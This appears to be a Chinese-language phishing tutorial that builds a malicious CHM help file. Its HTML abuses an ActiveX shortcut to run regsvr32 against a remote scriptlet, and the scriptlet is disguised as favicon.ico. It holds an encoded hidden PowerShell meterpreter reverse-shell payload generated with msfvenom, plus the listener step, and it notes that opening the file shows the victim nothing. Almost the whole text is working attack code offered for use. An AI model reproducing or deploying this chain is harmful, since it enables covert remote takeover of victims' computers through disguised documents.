下载Easy CHM

新建test文件夹->新建main.html,内容如下:

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',regsvr32.exe,/u /n /s /i:http://192.168.1.50/favicon.ico scrobj.dll'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

在网站目录放置favicon.ico内容如下:

payload: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.135 -f psh-cmd

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps1  = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEASAA5AFoARABWAG8AQwBBADcAVgBXACsAMgAvAGEAUwBCAEQAKwBPAFoAWAA2AFAAMQBnAFYARQByAFoASwBNAEIARABhAFAASwBSAEsAdAA3AFoANQBoAFUAYwBnAEQAaQBhAEUAUQA2AGUAdAB2AGIAYQBYAEwARgA1AG4AdgBRADYAQgBYAHYALwAzAEcAdwBOAHUAaQBaAHEAYwBjAHAAWABPAFMAcwBTAHUANQA3AEUAegAzADMAeQB6AFkAegArAE4AWABFAGwANQBwAEQAegB3AGMAYgAvAFQAZABKAFYAdgA3ADkAOABkAEQAYgBIAEEAUwAwAFUAdABpAE0AdgBiAHoAZwBrAFYASgBhAFgAQQB1AGoAZgBZAFgARwB4AFkAdAA2AG8AZABIAFkARgBHAFEAVgByAFYAOAA0AG4AeQBSAFYARgBuAEsASQA0AHQAdgBzAFEAMABtAGwAOQBjAG0ASwBrAFEASgBKAEsANwBmAGIAbABGAEoARQBvAFMAcwB2AHoASwBLAEUAbABVAFQAZgBsAGIAbQBZAFIARQBrAE8ATwByAHIAdwB2AGkAUwB1AFcAYgBVAHYAaQByADMARwBMADgASwAyAFoANwB0AGIAVwBKADMAWgBBAG8AeAB5AGoAeQBNAGwAbQBQAHUAegBpAEwAcgBXAHoASABqAEUAcQAxACsATwBlAGYAUgBXADEAMgBYAEoAMgBYAEcAdwA4AHAAWgBvAGwAYQB0AE4AZQBKAEoATQB1AHkAeAAxAGgAUgBVADcANQByADIAWQBFADMANgA1AGkAbwB4AFQANQAxAEIAVQArADQATAA4AHMAVABHAHAAMwBVAHkAdQBNAG8AdwBUADQAWgBnAEwAZABIADAAaQBjAHkANQBGADUAUwAxAEMAQQBOACsAQgBOAEUAcABpAEoAUwBkAGcAbABsAEgAbgBaAHkAdABRAGoATABvAGUAQQB1ADgAagB4AEIARQBsAEEAdgBkADYASgBIAGYAawAvAFUAUQBwAFEAeQBWAGwATAArAFUARwBmADcANAA2AC8AVABTAE4ASQBsAEEAYgBrAGsAZwBzAGMAMgBFAFkALwBVAEoAVQBtADUAagBTAE8AUABrAFcAdgBpAHoAOQBVAEIAVwBlAFYAWgB2ADkAVgBJAFAAVABRAEMAcgBhAEUAVQBXAGcAbABxADgAbABLAGMAZgBlADYAbABqAE8AeABNAGkAOQBxAHYAawBlAGEARgAxAE8AQgA1AFgAawB3AEEANABmAHYANwBkACsALwBmACsAVABrAE4ANABxAHQAeABCAGEAMgBmADAAUQBCAFcAUgA3AFAAdABtAGsAQwBzADYAcABBAG4AZABLAHYANgBSAGEAbQBVAGwARAA0AGMAaQBpAFUAWABhADkAZwBXAGIAawBSAEsAdABMAGsAeQB5ADQAbwB3AG0AOAArAFYAdwB1AE8AcABPAFYAeQB0AEQARgBsADYAMwBVAGMAMQBOAHcARAAxADYAQQB6AEYAZwBWAHkAdgBMAHEAOQBqAGsATQB3AGMAVAByADAANQBXAE8ANAByAFYAWQBnAGYAbgBPADYAbgAxAFgAawBtAGUAcAAxADAARgB2AEYAcABSAEsAeAAxAGgASgBmAFUAegBYAG0AbAB2AGwAUQBCADQAagBPAHkAVABiAHEAYwBxAHcAMABnAFAATABXADQARgB4AEQAUABJAG8AdwBFAFcARwBhAFEAbABwAFQAWgByADIAYQBOAEoAWgBVAC8AYgBJADIAVQBNAG8AOABJADUARQBJAFYARQA0AGcASwBDAHEAdwA5AEQAMgBaAFgASgBiAFgAWQBpAGYAcABrAEMAWQBqAHQAOQBrAFUAbwBpAEEAOQBzAEoAcgBuADIAbgBzAEgAcgAvAFAAUgBzAEQAMABwAEYAawArAEUAawBLAFMAbgBEAEYATgByAEoATABTAGsAMgB3AFkAeAA0AEoAUQBWAEYAQwBkADIATABVAEMAcgA1AGQAbABuADgARwBXADQALwBaAFoASwA2AE8ASgBHADUAdQA3AGwAMgBBAE8AWAArAFMASgBOAEgAaQBSAFMAcABDADMAVwBFADkARwAvAHMAbQBMAGcAVQBzAHcAeQBOAGsAdABLAG0ASABqAEgAVwBOAGcAMwB5AG8ANABzAHYAWQBtAEYAaQB4AG0AZwBVAGcASwBkAEgAcQBBAFcAOAB5AFQAQwB3AFoAYwBZAE8AQQBWAEgAKwBZAEkASgBXAHQAbwBuAHMATABHAE4ARwBsAHEAQwAzAGIAZQA4AG0AdwB3AEUAMAA4ADcANABqAHQAcABUAEMAQQBmAEcASwBMAHcAUwBhAGMAMwA1AEgAOABBAHkAVgBIAEkANgBEAE0ASwBIAFUATgB1AE8AeQBwAEQAaABVAFMATABnAG8ATQBvAFEAUABtAFAAWAA3AHcAUgB6AGMARgBuAGwAWQBwAGkARAA3AEUAcQBsADUASwA4ADIATQB0AGMAegBZAFgANABoAEUAbQBGAEYAMQBqADkAVQBXAEcAUwBFAEIAbABhAGIAZwBTAHcATQBuADUASABQAGQAbABnAEkAdwBVAHoALwBvAFYAOQBSAEUAOABFAHcANwBFAGUAdQA3AHgAagAyAHQAbwBoAFcAdABkAHYAcgB3AFAANgBZAG4ASABXADYAZABlAHQAMwBMAFIAVgBzAFgAMQBsAFAAbwBvADAANwBTADYAYgBlAEgAMQBxAGoAZAByAGoAOQBlADIAawA1AGQAMgBvADIATwA3AEEANAA3AHMAdAArADQAWABTAHgAcwAxAEwANABlAFQAKwBWAGQAQgA3AFYAdgBhAE8AVgArAFcAdAAvAEUAbAAzAFIAagA5ADUAQQAzAGYAZABJAC8AYgA0AHoATgBxAG0ASQA4AGIAUgBhAEIANQAwADgAdAAzAHcAOQBPAGYAZgB1ADYAKwBxAGwASgBlAHgATgB6AFoARgBSAHEAdQBHAGMAMQAwAHQANwBFAFcAQgBtAFYAZQB0AEsAZwBxAC8AYQBJAGoAawBmADMAbAAwADMANQBkAGUAbwB3AFAAUABiADEANABMAFoANgBqAHUAbABUAFQAeQB5AGMASwB1ADkAdgBPAGcAaQAxAHcAaABOADMAYwArAGsANwByAGIARAB2AHIAYQBkAHQALwBYAHgAUwB2ADAAYwBOAGgATQB5AG8ANABUAFEATgAzAHAAMABhAEEAZwAxADEAQgB3AGMATwBYADMAVQBEAEsANgB3AEYASgBqAEsAYQBMAGkAVgAzAG8AMwBIAFQARwBJADIAYQBCAGgAcQAzAEYAZwAvAFcAdQBSADYAQQA3AFMAMABPAGoAWQBsAFQAbwAzAGYAeAA3AFgAVQBJACsAeQBhAEUAMABOAFUAcgA5AFkANQBIAE4AbgB3ADYAQQBwAEIAYQBIAE8ASABnAEcAbgBRAEMAcwArAGEARwBQAHUAaABZAEgANQBIAHgAYwBjAEMAVABHAHIANAAzAE8ARABKAEEAcAAzAG4AMwBBAEgARgBOADQAKwBhAFEAZwBmAHgAbQBYAE8AUABJAFkAWQBOAGIAagBIAHAAMwA2ADYAYQB1AFYANgBmAEQATwBtAHAAWAA2AEsAUQBWAG8ATQB3AGwARABvAHcAUgBSAHMAbQBqAHQAYgBIADAAcQB1AE4AeABiAC8ASgBwAE0AUABWADEANQA1AGEAZAA2AHAAWgA1AEUANwB1ACsAcgB1AHUAcgB0AHQAVgAxADcANgBwAFAAWgAxAGUAbgBaADcAMABKAGQAWgBZAGMAagBYAFgAZAArAFoAQQB4AEEANgBoAFIANABHAHYAegBvAE4AeQB2ADMAZQA5ADkATABKAEkAUQBNADYAQQBCADMATgB0ADUAVAB6AGEANQBhAE8ANAB2ADQAQwBHAG4AbQBZAFcAcQA1AHYAUAA0AG4AbwBpAEkATQBKAGgAaABNAE8AVgB5AFIAaQBQAEcAdQBKAHQATgBnAC8AeQAyAGgAbQBHADAARwB4AEYAegBhAE0ANAB4AEwARQA5AHEATAA2ADQAMAA1AFkAZQBpADkAbgBOAE8ANQBLADgAdQBMAHUANABnADEAcQB4AGIAUgBGAGoAdQBrAFMAaQBRAFkAYQBuAHkAZABGAEsAcAB3AEQAMQBmAGUAYQBwAFgASQBOAE8AMwBwADIAZgB5AGUASwAxAG0AbgBrAHIAWgBtAE0AagBRADIAVAB0AG0AVwA4AGQAYQAxAGkAbwBGADkAMgB3AEEASgBHADIARgBwADIAMgBlAC8AdQAvAGcANwBYAHMAMQBoAEIALwB2AEQAZQBEADkAZgBQAGMAdgAwAGoAYwBCAFcAaQBsAHQAMAAvAC8AbAA3AGYATQBYAC8AdwBuAGQAMwA4AGwALwBnAHEAawBFAFoAUgB1AHUASABFAFoAMgBzAC8AQgBWAEcAUABaADAATwBmAGkAVwBPAEMAdwBWAHMATQBMAGYAUAA5AGwAWAAzAFYAVQBxAGoAdwBmAHcAcQBmAEUAUAA2ADMAMQB1ADUAMAB3AEsAQQBBAEEAPQAnACcAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=";
            $shell=new ActiveXObject("WScript.Shell")
            $shell.Run(ps1,0,true);
           
 
        ]]>
</script>
</registration>
</scriptlet>

点击文件->新建工程

《CHM钓鱼》

 

《CHM钓鱼》

监听

《CHM钓鱼》

 

《CHM钓鱼》

打开完全无状态。

已收到

《CHM钓鱼》